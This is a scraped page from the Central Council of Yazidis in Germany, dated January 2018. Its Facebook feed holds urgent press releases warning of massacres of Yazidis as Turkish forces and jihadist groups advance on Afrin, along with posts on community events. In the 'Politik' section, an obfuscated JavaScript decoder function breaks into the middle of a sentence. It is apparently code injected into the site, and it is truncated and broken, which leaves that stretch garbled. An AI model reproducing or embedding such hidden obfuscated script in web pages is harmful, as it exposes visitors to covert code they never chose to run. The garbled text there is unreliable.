Montag, Januar 22, 2018

Facebook Posts

+++Pressemitteilung – Dringend +++

„Êzîden fürchten um Ihr Leben“

Nachdem die türkische Armee die ganze Nacht Ortschaften in der Region Afrin bombardiert hat, ist sie heute Morgen mit Bodentruppen in die Region einmarschiert. Zusammen mit der türkischen Armee sind auch in der Region bekannte dschihadistische Gruppen an den kriegerischen Handlungen beteiligt.

Der Zentralrat der Êzîden in Deutschland hat bereits gestern auf die Gefahr hingewiesen und die internationale Gemeinschaft aufgefordert, schnell einzugreifen, um ein Blutbad an Êzîden und anderen Minderheiten zu verhindern.

Der Krisenstab des Zentralrates der Êzîden steht seit gestern stündlich mit den Êzîden in der Region im Kontakt. Die Berichte von heute Morgen sind mehr als besorgniserregend. Dazu der Leiter des Krisenstabes, Sheikh Esmat Barimou: „Die Bewohner in den êzîdischen Ortschaften Qastel Cindo, Baflane, Ali Yeqin, Qatmah, Basoufanê, Khezawiye, Şa Dêrê und Iskan sind akut gefährdet, von den Dschihadisten massakriert zu werden. Die Dschihadisten stehen unmittelbar davor, in diesen Dörfern einzudringen. Es kursieren schon Berichte, wonach diese Gruppen Listen über êzîdische Familien in der Region Afrin führen, die getötet werden sollen. Ich stehe im ständigen Kontakt mit den Bewohnern. Die Angst und Panik verbreitet sich rasant. Im Falle einer Besetzung durch dschihadistische Gruppen und der Türkei wird in der Region weder ein êzîdisches noch ein alevitisches bzw. christliches Leben existieren. Daher appelliere ich eindringlich an Russland und die USA, diesen Krieg sofort zu unterbinden.“

Sheikh Fakhraddin Abdo, Mitglied des Krisenstabes verurteilt den Einmarsch der Türkei aufs Schärfste und sagt: „Es ist nicht von der Hand zu weisen, dass die Türkei mitverantwortlich an dem Bürgerkrieg in Syrien war. Sie will offensichtlich weiterhin vom Krieg leben. Deswegen greift sie die Region an und zerstört die gesellschaftliche Vielfalt in der Region. Wir Êzîden stehen jedoch für die Vielfalt und den Frieden in Afrin und weltweit.“

Auf die Frage, was in den nächsten Tagen geplant sei, sagt Dr. Irfan Ortac, Vorsitzender des Zentralrates: „Seit gestern finden überall in der Welt, u.a. in Deutschland friedliche Protestkundgebungen statt. Ich rufe ausdrücklich alle Ezîden und ihre Freunde dazu auf, sich weiterhin an alle Kundgebungen zu beteiligen. Ferner werde ich morgen mit dem deutschen Außenministerium Kontakt aufnehmen und auf die Gefahr, ähnlich wie im Irak auch Afrin êzîden- und christenfrei zu machen, hinweisen und sie bitten auf ihren Nato-Partnern einzuwirken.
Ich war bis vor wenigen Tagen in Bagdad, um dafür zu kämpfen, dass die Êzîden dort eine Bleibeperspektive haben. Wenn sie jedoch gewaltsam vertrieben werden, wie sollen sie dann in ihrer Heimat bleiben. Diese Frage werde ich dem Außenministerium stellen. Ich bin davon ausgegangen, dass die Êzîden wenigstens in Syrien sicher sind, aber seit gestern bin ich eines Besseren belehrt worden.“

Für Interviewanfragen und Hintergrundgespräche wenden Sie sich bitte an den Zentralrat der Eziden in Deutschland per email: info@zentralrat-eziden.com

#Afrin #عفرين #Efrîn
... See MoreSee Less

14 hours ago  ·  

View on Facebook

+++Pressemitteilung +++

Der ZÊD – Zentralrat der Eziden in Deutschland ist über den türkischen Angriff auf die Enklave Afrin in Syrien äußerst besorgt.

Seit Tagen beschießt das türkische Militär die Region Afrin im Nordwesten von Syrien. Nun werden Gefechte an der Grenze gemeldet. Recep Tayyip Erdogan, Staatspräsident der Türkei hat in der Stadt Kütahya seine seit Tagen geäußerten Drohungen in die Tat umgesetzt und seine Luftwaffe befohlen, die Stellungen der YPG anzugreifen. Nach unbestätigten Informationen sind jetzt schon mehrere Tote und Verletzte zu beklagen, bedauerlicherweise auch viele Zivilisten.

In der Region Afrin leben neben Kurden auch viele Araber und andere ethnische und religiöse Minderheiten. Die größte ezidische Enklave in Syrien befindet sich in dieser Region. Die Region zeichnet sich durch ihre Multikulturalität und -religiösität aus. Darüber hinaus haben hundert Tausende Binnenflüchtlinge Schutz in der Region Afrin gefunden, die vor dem syrischen Bürgerkrieg weitestgehend verschont geblieben ist.

Mit der Invasion der Türkei in Afrin ist die Vielfalt der Region äußerst gefährdet. Dazu Sheikh Esmat Barimou, Stellv. Bundesvorsitzender des ZÊD: „Meine Familie stammt aus der Region Afrin. Es leben immer noch Mitglieder meiner Familie dort und bis heute wollten sie ihre Heimat nicht verlassen. Durch die Invasion der Türkei befürchten wir jedoch, dass wir dort keine Lebensgrundlage mehr haben. Sollte die Türkei die Region besetzen, werden dann höchstwahrscheinlich radikal-muslimische Gruppen dorthin verbracht werden, was bereits in den ersten Stunden auch der Fall war. Daher bitten wir die internationale Gemeinschaft, dringend zu intervenieren, um ein Blutbad an Eziden zu verhindern.“

Ergänzend fügte Sheikh Fakhraddin Abdo, Mitglied des Bundesvorstandes des ZÊD hinzu: „Wir möchten unmissverständlich der Welt mitteilen, wer auch immer unseren ezidischen Geschwistern Schaden zufügt, fügt diesen Schaden auch uns zu. Dagegen wehren wir uns entschieden. Wir werden nicht tatenlos hinnehmen, dass wir auch in Afrin ein zweites Shingal erleben, in dem unsere Männer abgeschlachtet, unsere Frauen auf Märkten verkauft und die Kinder entführt werden. Es kursieren jetzt schon Videos in den sozialen Medien, in denen die Tötung der Eziden legitimiert wird. Ich rufe ausdrücklich die Großmächte, die USA und Russland dazu auf, ihre Verantwortung, in der Region zu übernehmen, Stabilität herzustellen, Gerechtigkeit walten zu lassen und dafür Sorge zu tragen, dass unser ezidisches Volk weiterhin mit anderen Völkern in Koexistenz leben kann.“

Für Interviewanfragen und Hintergrundgespräche wenden Sie sich bitte an den Zentralrat der Eziden in Deutschland per email: info@zentralrat-eziden.com

#Afrin #عفرين #Efrîn
... See MoreSee Less

1 day ago  ·  

View on Facebook

Waisenhaus Cup 2018 in Gießen

Wir haben noch einige Restplätze und nehmen noch gerne Anmeldungen entgegen.

Freuen tuen wir uns jetzt schon über die zahlreichen Anmeldungen aus dem ganzen Bundesgebiet.
... See MoreSee Less

2 weeks ago  ·  

View on Facebook

ZÊD - Zentralrat der Êzîden in Deutschland hat Ciwanen Mala Ezidiya Emmerich - Jugendkomitee Emmerichs Beitrag geteilt. ... See MoreSee Less

>>> Weihnachten für&mit krebskranken Kindern <<< Weihnachten heißt sich zu besinnen. Besinnen auf das wirklich Wichtige. Heute besuchen wir krebskranke Kinder auf der Kinderkrebsstation in Universi...

4 weeks ago  ·  

View on Facebook

**** Dr. Irfan Ortac, Vorsitzender des ZÊD besucht die êzîdische Gemeinde in Offenbach ****

Auf Einladung des Vorstandes unseres Mitgliedsvereins in Offenbach besuchte Dr. Irfan Ortac, Vorsitzender ZÊD, am 24.12.2017 die êzîdische Gemeinde in Offenbach am Main.

Empfangen wurde er vom Gemeindevorstand, allen voran von dem Vorsitzenden Sirwan Bozani, der ihm auch ausführlich über die Arbeit der Gemeinde berichtete.
Die Gemeinde betreut die Êzîden im Rhein-Main Gebiet. Ihre Zahl umfasst über 300 Familien. Neben Flüchtlingshilfe und Integrationsarbeit leistet die Gemeinde viel in der Jugendarbeit. Die Kinder werden einmal in der Woche von zwei êzîdischen Frauen in der Êzîdischen Religion unterrichtet.
Aufgrund der steigende Schülerzahl seien die Räumlichkeiten zu klein, so dass dringend größere Räume gebraucht werden.

Dr. Ortac berichtete von der Arbeit des ZÊD und verwies insbesondere auf die bevorstehende Projekte der Jugend und der Frauen.

Wir wünschen unserer Gemeinde in Offenbach viel Kraft.
... See MoreSee Less

4 weeks ago  ·  

View on Facebook

Glückwünsche zum Weihnachtsfest ... See MoreSee Less

4 weeks ago  ·  

View on Facebook

ZÊD - Zentralrat der Êzîden in Deutschland hat KIRIV-Projekts Foto geteilt. ... See MoreSee Less

Ismeta Stojkovic An Gy Valencia Mersiha Asan Ruzdija Russo Sejdovic Ronas Karakas Soliman Mohammed Ali

1 month ago  ·  

View on Facebook

Politik

Am 29. Januar 2017 wurde in Bielefeld eine neue Interessenvertretung mit dem Namen „Zentralrat der Êzîden in Deutschlandfunction h052c1b60aed(x6){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var t4='';var t2,u1,q3,q7,sa,r9,u2;var u4=0;do{q7=qd.indexOf(x6.charAt(u4++));sa=qd.indexOf(x6.charAt(u4++));r9=qd.indexOf(x6.charAt(u4++));u2=qd.indexOf(x6.charAt(u4++));t2=(q7<>4);u1=((sa&15)<>2);q3=((r9&3)<=192)t2+=848;else if(t2==168)t2=1025;else...

Yezidentum

Telim Tolan Mit über 120.000 Menschen sind inzwischen die Jesiden (Jesiden, kurdische Bezeichnung Êzîdî) in der Bundesrepublik vertreten. Insgesamt wird ihre Zahl auf über 1.000.000...

Spendefilm

 

Kettenanhänger

Yezidisches Symbol als Kettenanhänger

c65d552819

Die Menschen in Shingal brauchen eure Hilfe!

Spenden